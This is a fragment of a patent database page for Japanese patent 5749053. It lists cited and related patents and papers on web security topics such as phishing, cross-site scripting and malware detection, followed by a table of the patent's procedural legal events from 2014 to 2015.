US8763071B2 (en) Systems and methods for mobile application security classification and enforcement
US8429751B2 (en) Method and apparatus for phishing and leeching vulnerability detection
Parampalli et al. A practical mimicry attack against powerful system-call monitors
EP2306357A2 (en) Method and system for detection of previously unknown malware
US20060123478A1 (en) Phishing detection, prevention, and notification
US9722970B2 (en) Registering for internet-based proxy services
Kirda et al. Noxes: a client-side solution for mitigating cross-site scripting attacks
US7343626B1 (en) Automated detection of cross site scripting vulnerabilities
Stamm et al. Drive-by pharming
US20060070126A1 (en) A system and methods for blocking submission of online forms.
Jackson et al. Forcehttps: protecting high-security web sites from network attacks
EP2037384A1 (en) Method and apparatus for preventing web page attacks
CN100471104C (en) Illegal communication detector

Legal Events

Date Code Title Description
A621 Written request for application examination

Free format text: JAPANESE INTERMEDIATE CODE: A621

Effective date: 20140310

A977 Report on retrieval

Free format text: JAPANESE INTERMEDIATE CODE: A971007

Effective date: 20141205

A131 Notification of reasons for refusal

Free format text: JAPANESE INTERMEDIATE CODE: A131

Effective date: 20150120

A521 Written amendment

Free format text: JAPANESE INTERMEDIATE CODE: A523

Effective date: 20150323

TRDD Decision of grant or rejection written
A01 Written decision to grant a patent or to grant a registration (utility model)

Free format text: JAPANESE INTERMEDIATE CODE: A01

Effective date: 20150414

A61 First payment of annual fees (during grant procedure)

Free format text: JAPANESE INTERMEDIATE CODE: A61

Effective date: 20150513

R150 Certificate of patent or registration of utility model

Ref document number: 5749053

Country of ref document: JP

Free format text: JAPANESE INTERMEDIATE CODE: R150

R250 Receipt of annual fees

Free format text: JAPANESE INTERMEDIATE CODE: R250